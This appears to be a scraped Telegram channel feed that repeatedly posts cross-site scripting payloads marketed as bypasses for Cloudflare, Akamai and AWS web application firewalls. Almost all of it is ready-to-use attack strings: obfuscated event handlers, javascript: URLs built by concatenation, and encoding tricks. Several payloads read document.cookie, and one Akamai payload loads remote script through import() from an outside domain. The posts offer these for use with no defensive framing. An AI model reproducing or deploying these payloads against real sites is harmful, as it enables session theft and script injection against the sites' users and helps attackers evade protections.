XSS WAF Bypass using location concatenation
Payload:
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#Xss #WAF #bypass ——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
payloads to bypass CloudFlare WAF
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡9👍1
An Akamai WAF bypass
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1🔥1
A payload to bypass some WAF
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍3🔥2
Xss Bypass Waf
——————
0Day.Today
@LearnExploit
@Tech_Army
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
#bypass #waf ——————
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
CloudFlare WAF bypass payload
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7❤2👍2
An Akamai WAF bypass payload
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤1
An Akamai WAF bypass payload
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍1
A payload to bypass WAF
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4
Cloudflare WAF Bypass ⚡️
#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<a"/onclick=(confirm)(origin)>Click Here!#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4
This media is not supported in your browser
VIEW IN TELEGRAM
Fuzzing and Bypassing the AWS WAF
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3⚡2🔥1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
javascript:var{a:onerror}={a:alert};throw%20document.domain#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
✍4⚡3🔥3👍1
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used :⛔
Payload Used :
#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Used :
"><img src=x onerror=alert(1)> [Blocked By Cloudflare] Payload Used :
"><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥4❤2👍1👎1
Akamai WAF bypass XSS
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4🔥3💯2⚡1❤1
bypass XSS Cloudflare WAF
Encoded Payload:
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Encoded Payload:
"><track/onerror='confirm\%601\%60'>Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5
Xss Payload
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍1